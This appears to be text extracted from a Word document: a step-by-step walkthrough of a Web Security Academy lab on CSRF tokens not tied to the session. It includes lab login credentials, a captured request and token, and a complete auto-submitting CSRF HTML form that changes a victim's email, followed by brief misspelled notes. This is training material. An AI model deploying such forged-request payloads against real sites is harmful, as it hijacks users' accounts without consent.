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 xml:space="preserve">Lab 4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CSRF where token is not tied to user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a CSRF token that is not tied to the user's session — reuse another user's token.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CSRF Vulnerability With Token Not Tied To Session — Step-by-Step PoC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Exploit the CSRF vulnerability to change the victim’s email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This lab is vulnerable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CSRF tokens are not tied to the user's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Meaning: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token from Wiener account can work on Carlos/victim account.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 — Login as Wiener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browser and login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Username: wiener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Password: peter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2 — Intercept Email Change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Turn Burp Intercept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My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email to anything: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abc@gmail.com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Update email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3 — Copy CSRF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will capture request like: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POST /my-account/change-email HTTP/2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email=abc%40gmail.com&amp;csrf=V1QEi3uKYnCe6EWmi4QkcW4FFQ2WdPBh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Copy ONLY the token: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V1QEi3uKYnCe6EWmi4QkcW4FFQ2WdPBh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4 — Drop The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Important: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 NOT forward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 must remain unused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5 — Open Exploit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Exploit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Delete everything from Body section.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6 — Paste Final CSRF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Paste this exact payload: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&lt;html&gt;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&lt;body&gt;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&lt;form action="https://0abc00f7033b795280ea175c005f00af.web-security-academy.net/my-account/change-email" method="POST"&gt;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name="email" value="xaa@gmail.com" /&gt;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name="csrf" value="V1QEi3uKYnCe6EWmi4QkcW4FFQ2WdPBh" /&gt;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&lt;/form&gt;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history.pushState('', '', '/');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document.forms[0].submit();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&lt;/body&gt;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&lt;/html&gt;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7 — Store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Store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8 — Deliver To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IMPORTANT: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 NOT click View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Because token is single-use.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Immediately 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 to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victim account email changes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 solved ✅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Image Of Lab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Csrf Token Change Every Time You Have To Get Newtocken After Generated Poc Csrf Use New Tocken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Find The Request Of Weiner Account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Generat Ethe Poc Csrf Of Weiner Request Chain Mail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Open The 2nd Account Carlos And Take The Csef Tocken Of Carlos And Use In The Weiner Paylaod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CSRF where token is not tied to user session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CSRF — Lab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1b7cdc8c2b630565671e78862ca86b4532ca0d.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/1b6802bd7db6d6fc4dcc93b4aeda236cc1b80065.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/0cde30e70bc4f98e6ec740fa8825e85c59c2eb25.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/4baa3de2f51c4cfb98f66a84e58e1d0186b78df2.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/80717c8d9e991167a0dd64a95a14a282fbed1ce0.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e2ec3962b28d34d3b0c8302669df0591721d101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2026-05-24T12:08:30.875Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-24T12:08:30.875Z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